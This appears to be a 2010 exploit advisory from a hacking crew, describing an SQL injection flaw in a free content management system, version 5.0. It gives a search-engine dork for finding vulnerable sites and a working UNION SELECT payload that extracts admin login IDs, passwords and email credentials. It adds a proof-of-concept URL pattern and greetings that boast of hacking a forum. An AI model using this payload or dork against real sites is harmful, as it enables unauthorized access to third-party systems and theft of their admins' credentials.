53 lines
No EOL
1.5 KiB
Text
53 lines
No EOL
1.5 KiB
Text
-----------------------------------------------------------------------
|
|
CmS (id) SQL Injection Vulnerability
|
|
-----------------------------------------------------------------------
|
|
Author : spykit
|
|
Site : http://devilzc0de.org/
|
|
Date : April, 22-2010
|
|
Location : Jakarta, Indonesia
|
|
Time Zone : GMT +7:00
|
|
----------------------------------------------------------------
|
|
|
|
Affected software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
Application : CmS
|
|
Vendor : http://hotsweb.com
|
|
Price : free
|
|
Version : version 5.0
|
|
Google Dork: allinurl: Category.php?IndustrYID=
|
|
---------------------------------------------------------------
|
|
|
|
Exploitz:
|
|
~~~~~~~
|
|
|
|
union all select
|
|
1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from
|
|
admin--
|
|
|
|
|
|
SQLi p0c:
|
|
~~~~~~~
|
|
|
|
http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]
|
|
----------------------------------------------------------------
|
|
|
|
Shoutz:
|
|
~~~~
|
|
|
|
- 'oH lawd !! Malingsial lame forum g0t hacked for second times by
|
|
Us,lulz...'
|
|
-
|
|
LeQhi,lingah,GheMaX,v3n0m,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
|
|
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
|
|
- kiddies,whitehat,c4uR,xtr0nic,adwisatya, and all member crew devilzc0de...
|
|
-hendri_note: jgn suka ngambek kang malu sama umur.. bruakkakaka
|
|
- #devilzc0de @irc.dal.net
|
|
----------------------------------------------------------------
|
|
Contact:
|
|
~~~~
|
|
|
|
spykit | devilzc0de CREW | daniel_sapuleka@yahoo.com
|
|
Homepage: http://devilzc0de.org
|
|
|
|
---------------------------[EOF]-------------------------------- |